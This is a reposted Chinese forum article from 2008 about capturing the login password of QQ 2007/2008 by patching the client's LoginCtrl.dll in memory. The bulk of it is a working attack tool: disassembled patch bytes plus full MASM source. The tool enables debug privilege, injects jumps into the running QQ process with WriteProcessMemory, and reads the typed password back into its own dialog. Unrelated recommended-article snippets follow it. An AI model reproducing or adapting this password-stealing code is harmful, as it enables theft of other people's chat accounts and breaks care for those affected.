修改QQ执行顺序,获取QQ2008最新版密

最新推荐文章于 2024-10-03 12:55:23 发布
原创 最新推荐文章于 2024-10-03 12:55:23 发布 · 1.3k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#qq #null #token #include #timer #access

本文介绍了一种通过修改QQ执行顺序来获取QQ2008最新版密码的方法。利用ASM代码对特定地址进行改写,实现了密码的读取,并通过对话框展示密码。
作 者: 4st0ne
时 间: 2008-03-20,10:28
链 接: http://bbs.pediy.com/showthread.php?t=61577

本文参考于open[xgc]大侠的"利用Debug Api 获得QQ2007密码",我只是换了语言换了方法,其实思路还是一样的.再次对open[xgc]表示感谢.

标 题: 修改QQ执行顺序,获取QQ2008最新版密码
作 者: sLtYJ(4stone)
版权声明: 本文纯属技术交流, 转载请注明作者并保持文章的完整, 谢谢!

参考open[xgc]大侠的文章,找到2007 7.1.643.400版及2008 8.0.714.201版本QQ的密码出现点,修改代码跳转至空白位置,然后将代码按个写入自己找到的空白位置即可.

列出2007办部分修改后的代码:
021A638A  |> /43            /INC EBX
021A638B  |. |6A 01         |PUSH 1
021A638D  |. |8BC3          |MOV EAXEBX
021A638F  |. |0FAFC6        |IMUL EAXESI
021A6392     |8A4C08 FF     MOV CLBYTE PTR DS:[EAX+ECX-1]
021A6396     |E9 4F240100   JMP LoginCtr.021B87EA  //修改点,跳至空白点
021A639B     |90            NOP
021A639C     |90            NOP
021A639D     |90            NOP
021A639E     |90            NOP
021A639F     |90            NOP
021A63A0  |. |50            |PUSH EAX
021A63A1     |884D D4       MOV BYTE PTR SS:[EBP-2C], CL
021A63A4     |E8 4AD30000   CALL LoginCtr.021B36F3
021A63A9  |. |8B57 44       |MOV EDXDWORD PTR DS:[EDI+44]
021A63AC  |. |83C4 0C       |ADD ESP, 0C
021A63AF  |. |8B0A          |MOV ECXDWORD PTR DS:[EDX]
021A63B1  |. |8B72 0C       |MOV ESIDWORD PTR DS:[EDX+C]
021A63B4  |. |8B41 F8       |MOV EAXDWORD PTR DS:[ECX-8]
021A63B7  |. |99            |CDQ
021A63B8  |. |F7FE          |IDIV ESI
021A63BA     |3BD8          CMP EBXEAX
021A63BC    ^/7C CC         JL SHORT LoginCtr.021A638A

补上自己的代码:
021B87EA      52            PUSH EDX
021B87EB      BA 56CC1200   MOV EDX, 12CC56
021B87F0      03D3          ADD EDXEBX    //借用QQ程序本身的EBX计数器
021B87F2      36:880A       MOV BYTE PTR SS:[EDX], CL   //向12CC56开始逐个写入密码
021B87F5      5A            POP EDX
021B87F6      8D45 D4       LEA EAXDWORD PTR SS:[EBP-2C]
021B87F9      50            PUSH EAX
021B87FA      8D85 58FFFFFF LEA EAXDWORD PTR SS:[EBP-A8]
021B8800    ^ E9 9BDBFEFF   JMP LoginCtr.021A63A0  //跳回原处继续执行
021B8805      90            NOP


用ASM代码实现如下:

GetQQpwd.Asm
引用:
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Dialog.asm
; 对话框资源使用的模板代码
    .386
    .model flatstdcall
    option casemap :none
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
include    GetQQpwd.inc
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; 代码段
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
        .code
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
StrLen PROC uses edi String:DWORD
        mov edi,String
        mov al,0
        mov ecx,0FFFFFFFFh
        repne scasb
        sub ecx,0FFFFFFFFh
        neg ecx
        dec ecx
        mov eax,ecx
        ret
StrLen ENDP
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;    权限提升
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_EnablePrivilege proc szPriv:DWORD, bFlags:DWORD
    LOCAL      hToken
    LOCAL       tkp : TOKEN_PRIVILEGES

    invoke     GetCurrentProcess
    mov       edxeax
    invoke     OpenProcessToken, edx, TOKEN_ADJUST_PRIVILEGES or TOKEN_QUERY, addr hToken
    invoke     LookupPrivilegeValue, NULL, szPriv, addr tkp.Privileges.Luid
    mov      tkp.PrivilegeCount, 1
    xor       eaxeax

    .if     bFlags
          mov    eax, SE_PRIVILEGE_ENABLED
    .endif

    mov       tkp.Privileges.Attributes, eax
    invoke     AdjustTokenPrivileges, hToken, FALSEaddr tkp, 0, 0, 0
    push       eax
    invoke     CloseHandle, hToken
    pop       eax

    ret
_EnablePrivilege endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_ProcTimer    proc    uses ebx edi esi _hWnd,_uMsg,_idEvent,_dwTime

        .if    !hQQ
            invoke    FindWindowA,ctxt("#32770"),ctxt("QQ用户登录")
            .if    eax
                invoke    GetWindowThreadProcessId,eax,addr QQpid
                invoke    OpenProcess,PROCESS_ALL_ACCESS,FALSE,QQpid
                mov    hQQ,eax
                invoke    SetWindowText,hWinMain,ctxt("QQ已启动-请输入密码并点登录")
                invoke      CreateToolhelp32Snapshot,TH32CS_SNAPALL,QQpid
                mov         hSnapShot,eax
                mov         myModule.dwSize, sizeof myModule
                invoke    Module32First,hSnapShot,addr myModule
                jmp    Cmp1
            NextModule:
                invoke    Module32Next,hSnapShot,addr myModule
            Cmp1:
                invoke    lstrcmp,addr myModule.szModule,ctxt("LoginCtrl.dll")
                cmp    eax,0
                jnz     NextModule
                mov    ebx,myModule.modBaseAddr
                add    ebx,16396h;2008:16DE0h,2007:16396h
                invoke    ReadProcessMemory,hQQ,ebx,addr dbOldBytes,2,NULL
                mov    ax,word ptr dbOldBytes
                .if    ax == word ptr db2007
                    invoke    WriteProcessMemory,hQQ,ebx,addr dbPatched1,10,NULL
                    add    ebx,12454h;2008:134EAh 2007:12454h
                    invoke    WriteProcessMemory,hQQ,ebx,addr dbPatched2,28,NULL
                    invoke    WriteProcessMemory,hQQ,12B000h,0,16,NULL
                .elseif    ax == word ptr db2008
                    add    ebx,0A4Ah
                    invoke    WriteProcessMemory,hQQ,ebx,addr dbPatched3,10,NULL
                    add    ebx,134EAh
                    invoke    WriteProcessMemory,hQQ,ebx,addr dbPatched4,27,NULL
                    invoke    WriteProcessMemory,hQQ,12B000h,addr dbNull,16h,NULL
                .endif
            .endif
        .else
            invoke    ReadProcessMemory,hQQ,12B000h,addr QQpwd,sizeof QQpwd,NULL
            invoke    StrLen,addr QQpwd
            .if    eax
                invoke    SetDlgItemText,hWinMain,IDC_EDT1,addr QQpwd
                invoke    WriteProcessMemory,hQQ,12B000h,addr dbNull,16h,NULL
            .endif
                invoke    FindWindow,ctxt("#32770"),ctxt("QQ用户登录")
            .if    !eax
                mov    hQQ,0
                invoke    SetWindowText,hWinMain,ctxt("QQ未运行")
            .endif
        .endif
        ret

_ProcTimer    endp
_ProcDlgMain    proc    uses ebx edi esi hWnd,wMsg,wParam,lParam

        mov    eax,wMsg
        .if    eax == WM_COMMAND
            mov    eax,wParam
            .if    ax == IDC_btExit
                invoke    EndDialog,hWnd,NULL
            .endif
        .elseif    eax == WM_CLOSE
            invoke    EndDialog,hWnd,NULL
        .elseif    eax == WM_INITDIALOG
            invoke    LoadIcon,hInstance,ICO_MAIN
            invoke    SendMessage,hWnd,WM_SETICON,ICON_BIG,eax
            invoke    SetTimer,NULL,NULL,1000,addr _ProcTimer
            mov    idTimer,eax
            push    hWnd
            pop    hWinMain
            invoke     _EnablePrivilege,ctxt("SeDebugPrivilege"), TRUE
            invoke    SendDlgItemMessage,hWnd,IDC_EDT1,EM_SETREADONLY,TRUE,0
            invoke      SetWindowPos,hWnd,HWND_TOPMOST,0,0,0,0,SWP_NOMOVE or SWP_NOSIZE
        .else
            mov    eax,FALSE
            ret
        .endif
        mov    eax,TRUE
        ret

_ProcDlgMain    endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
start:
        invoke    GetModuleHandle,NULL
        mov    hInstance,eax
        invoke    InitCommonControls
        invoke    DialogBoxParam,hInstance,DLG_MAIN,NULL,offset _ProcDlgMain,NULL
        invoke    ExitProcess,NULL
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
        end    start
GetQQpwd.inc
引用:
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Include 文件定义
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
include        windows.inc
include        user32.inc
includelib        user32.lib
include        kernel32.inc
includelib        kernel32.lib
include        advapi32.inc
includelib        advapi32.lib
include        comctl32.inc
includelib        comctl32.lib
include        psapi.inc
includelib        psapi.lib
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Equ 等值定义
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
ID_TIMER1    equ    10
DLG_MAIN    equ    1
IDC_EDT1        equ     2
ICO_MAIN     equ    99
IDC_btExit    equ    1000
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; 数据段
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
        .data?

hInstance        dd        ?
hWinMain        dd        ?
idTimer        dd        ?
QQpid        dd        ?
hQQ        dd        ?
modArr        db        1024 dup(?)
dwNumMod    dd        ?
myModule                 MODULEENTRY32  <>
hSnapShot    dd        ?
QQpwd        db        22 dup(?)
dbOldBytes    db        2 dup (?)

        .data
        
db2007        db        8Dh,45h
db2008        db        6Ch,88h    
dbPatched1    db        0E9h,4Fh,24h,01h,00h,90h,90h,90h,90h,90h
dbPatched2    db        52h, 0BAh, 0FFh, 0AFh, 12h, 00h, 03h, 0D3h, 36h, 88h, 0Ah, 5Ah, 8Dh, 45h, 0D4h, 50h, 8Dh, 85h, 58h, 0FFh, 0FFh, 0FFh, 0E9h, 9Bh, 0DBh, 0FEh, 0FFh, 90h
dbPatched3    db        0E9h, 0E5h, 34h, 01h, 00h, 90h, 90h, 90h, 90h, 90h
dbPatched4    db        52h, 0BAh, 0FFh, 0AFh, 12h, 00h, 03h, 0D3h, 36h, 88h, 0Ah, 5Ah, 8Dh, 45h, 0D4h, 50h, 8Dh, 85h, 58h, 0FFh, 0FFh, 0FFh, 0E9h, 05h, 0CBh, 0FEh, 0FFh
dbNull        db        00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
注:刚学ASM不久,代码可能显得很乱很烦,各位看官多多包涵.
PE文件格式与API HOOK
zacklin的专栏
04-27 639
对于windows低层编程来说,进行API拦截始终是一件让人激动的事,用自己的代码来改变其它程序的行为,还有比这个更有趣吗?而且,在实现API拦截的过程中我们还有机会去熟悉许多在RAD编程环境中很少接触的东西,如DLL远程注入、内存管理,PE文件格式等知识。许多商业软件,如金山词霸等词典软件,各种即时汉化软件、甚至一些网络游戏的外挂中都用到了这种技术,各种调试工具中多多少少也要用到这种技术。 实
QQ2009下载地址泄QQ2009最新版
ddsdsdsdl333l的专栏
06-14 1646
正 文: 这几天,不断有网友说,qq2009出来了,邀请他做内测呢。据说效果还不错,很多人得到了qq2009的邀请了;于是,若干网友便追着问qq2009下载地址在哪。由此可见,如今QQ在中国的火爆。在2007年7月,腾讯QQ同时最高在线人数就突破3000万了,QQ用户数已经覆盖了我国近90%网民。这是一个十分庞大的数字了。 简单介绍一下:通过持续的努力和改进,QQ团队在2008新年推出了体验更
QQ产品界面变更之路
一地鸡毛
10-10 1万+
1 OICQ 1999 做中国的ICQ,腾讯误打误撞上路 1996的夏天,以色列的三个年轻人维斯格、瓦迪和高德芬格在一次聚会上决定携手开发一款软件,通过充分利用互联网快速即时的特点去实现人与人直接的在线交流,ICQ便应运而生。一年后,马化腾接触到了ICQ并成为它的用户,感受到其魅力的同时也看到其局限性——英文界面,操作上不够亲民。这也使得当时ICQ在国内始终不是特别普及,往往仅限于
ubuntu安装所涉及的。。。
mtawaken的专栏
07-29 857
<br /><br />        最新的ubuntu10.04LTS版本已经放出,大家可以下载liveCD或者alternate版本。前者相当于windows的ghost版,有图形化安装界面且安装速度快;后者为传统安装版,安装界面类似winXP的安装版(怎么这么罗嗦)。下载完699MB的ISO不管你是刻盘还是u盘量产,能启动就好。注意!经本人实测,alternate版本不支持ultraISO直接写入启动,必须刻盘或量产。还有硬盘安装的方式,如wubi,在这里不推荐大家使用,麻烦还容易出问题。<br /
Ubuntu9.10详细攻略,从安装到配置,一条龙
12-20 2256
从现在起。       只谈技术,不谈情。 Ubuntu9.10具体攻略,从安装到配置,一条龙。       哥原创的,注意版权 : ) 今天终于把Ubuntu9.10正式版给配置好了。       有人问我详细的步骤,我懒得一个个讲解,现在一起打出来算了。 首先。       安装。 先去下载一个ubuntu-9.10的ISO光盘映像 一般的电脑都是Intel
SEO基础知识
热门推荐
猿来这样-谢厂节的博客
01-03 5万+
本文内容是我在6年前写的了,其中有很多内容是当时从网上复制的。现在放上来,后面有空闲时间再逐步进行一些适应潮流的修改。同时部份内容对原作者表示感谢。如果您认为对您有侵权内容,请与我联系我及时修正。(QQ 2581529)      许多网站在设计的时候,就需要考虑SEO的影响因素。所以SEO不仅是SEOER的工作,也是开发人员的工作。 一、 什么是SEO 7 一、 什么是SEO 10
多普达S900 使用详细说明(使用技巧大全)
wnq498yx
01-19 1746
多普达S900 使用详细说明(使用技巧大全) 2010年06月17日   多普达S900 使用详细说明(使用技巧大全)!!!      (2010-01-08 19:00:35)   标签:手机 电脑 imei 4g 关屏 多普达 s900 it分类:精文/转载   最近玩一款手机多普达S900,由于是智能WINDODSMOBILE系统的,所以很多刚刚拿到这款手机的主人还搞不清...
【转】S60 V3 常见问题解决方法...
weixin_33978044的博客
10-16 1494
S60 V3 常见问题解决方法... 一、手机设置类问题问题1、为什么没办法选择我手机中的MP3作铃声?答:把MP3放入手机或闪存卡的“\Sounds\Digital”这个文件夹中就可以.问题2、为什么我手机的音乐库不能正常更新?答:音乐应该放在卡“\Sounds\Digital”这个文件夹中就可以正常更新了.如还不能正常更新或出错...
黑莓8700 4.2 ROM与QQ2008兼容性详解与安装指南
weixin_26907223的博客
10-03 1218
本文还有配套的精品资源,点击获取 简介:本文探讨了黑莓8700手机升级到4.2 ROM后的系统特性,并说明了如何在该手机上安装并稳定运行QQ2008。内容涵盖了黑莓8700的基本介绍、ROM和固件升级的重要性、QQ2008对黑莓的支持,以及详细的操作步骤和用户反馈。文章旨在为希望改善黑莓8700使用体验的用户提供可靠的信息和指南。 1. 黑莓8700手机特点和功能 ...
发送信息到QQ2008正式版
12-08
为您提供发送信息到QQ2008正式版下载,发送信息到QQ2008正式版系统结构:查找子窗口,取窗口矩形,发送消息_,======窗口程序集1| || |------ __启动窗口_创建完毕| || |------ _按钮1_被单击| || |------ _按钮2_被单击...
仿qq界面实现(仿照qq2008版界面实现)
03-15
在本文中,我们将深入探讨如何使用C++编程语言来实现一个仿照QQ2008版界面的应用程序。QQ作为一款流行的即时通讯软件,其用户界面设计独特且易用,吸引了大量的用户。为了重现这样的用户体验,我们需要理解界面设计...
最新QQ2008贺岁协议分析第三版
03-14
总之,《最新QQ2008贺岁协议分析第三版》是一份深入探讨网络协议的宝贵资料,无论是对于网络编程爱好者还是专业开发者,都能从中获取到丰富的知识和实践经验。通过学习这份文档,我们可以更好地理解和构建自己的网络...
模仿小红书的小网页.html
11-25
模仿小红书的小网页.html
Docker部署GitLab指南[代码]
11-25
本文详细介绍了使用Docker-compose部署GitLab的完整步骤。首先从DockerHub拉取最新版GitLab镜像,然后创建必要的目录结构并编辑docker-compose.yml配置文件,其中包含了端口映射、卷挂载和环境变量等关键配置项。接着通过docker compose命令快速启动GitLab服务,并提供了访问GitLab仓库的方法。最后还说明了如何获取初始root用户码进行登录。整个过程经过作者亲测有效,为需要搭建GitLab服务的用户提供了实用参考。
ByVision_Cutting_Laser_V6-1-0_操作说明.pdf
11-25
ByVision_Cutting_Laser_V6-1-0_操作说明.pdf
51单片机c源码-1个共阳数码管显示变化数字
最新发布
11-25
51单片机c源码-1个共阳数码管显示变化数字
【高速以太网物理层】1.6TbE PCS通道形成与对齐标记插入机制:面向IEEE 802.3dj标准的多通道数据分布及FEC降级监测方案设计
11-25
内容概要:本文档提出了1.6TbE PCS(物理编码子层)中PCS通道形成与对齐标记(AM)插入的基线方案,作为IEEE P802.3dj任务组标准制定的一部分。文档详细描述了1.6TbE系统中如何将RS-FEC符号按轮询方式分配到16个PCS通道中,每个通道速率为100Gbps,并定义了AM标记在各通道中的分布结构与插入机制。通过对齐标记的映射规则、填充方式、状态字段传输以及伪代码实现,确保发送端与接收端的数据对齐、解交错与正确恢复。此外,还涵盖了FEC误码劣化信号生成和HI_SER监控机制,并讨论了PMA层在不同接口配置下的符号复用要求。该提案与先前采纳的基线共同构成完整的1.6TbE PCS规范。; 适合人群:从事高速以太网物理层设计、通信协议开发或标准制定的工程师和技术专家,具备数字通信与FEC编码基础知识的研发人员; 使用场景及目标:①为1.6TbE以太网PCS层的设计提供标准化参考;②指导硬件实现中的AM插入/删除、通道形成、误码监测等功能模块开发;③支持多厂商设备互操作性的统一规范制定; 阅读建议:此文档技术性强,涉及大量底层符号映射与伪代码逻辑,建议结合IEEE 802.3现有标准(如CL119、CL172)对照阅读,并关注后续对时钟内容与基线漂移的分析补充。
基于SSM的小码创客教育教学资源库的设计与实现
11-25
随着信息技术在管理上越来越深入而广泛的应用,作为学校以及一些培训机构,都在用信息化战术来部署线上学习以及线上考试,可以与线下的考试有机的结合在一起,实现基于SSM的小码创客教育教学资源库的设计与实现在技术上已成熟。本文介绍了基于SSM的小码创客教育教学资源库的设计与实现的开发全过程。通过分析企业对于基于SSM的小码创客教育教学资源库的设计与实现的需求,创建了一个计算机管理基于SSM的小码创客教育教学资源库的设计与实现的方案。文章介绍了基于SSM的小码创客教育教学资源库的设计与实现的系统分析部分,包括可行性分析等,系统设计部分主要介绍了系统功能设计和数据库设计。 本基于SSM的小码创客教育教学资源库的设计与实现有管理员,校长,教师,学员四个角色。管理员可以管理校长,教师,学员等基本信息,校长角色除了校长管理之外,其他管理员可以操作的校长角色都可以操作。教师可以发布论坛,课件,视频,作业,学员可以查看和下载所有发布的信息,还可以上传作业。因而具有一定的实用性。 本站是一个B/S模式系统,采用Java的SSM框架作为开发技术,MYSQL数据库设计开发,充分保证系统的稳定性。系统具有界面清晰、操作简单,功能齐全的特点,使得基于SSM的小码创客教育教学资源库的设计与实现管理工作系统化、规范化。
QQ2008贺岁版协议深度分析文档
标题中提到的“QQ2008协议分析”涉及了对腾讯公司开发的一款即时通信软件QQ的旧版本——QQ2008贺岁版的协议层面的研究。协议分析是指对软件或系统中用于不同组件间通信的规则和约定进行深入研究的过程。由于这一版本...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值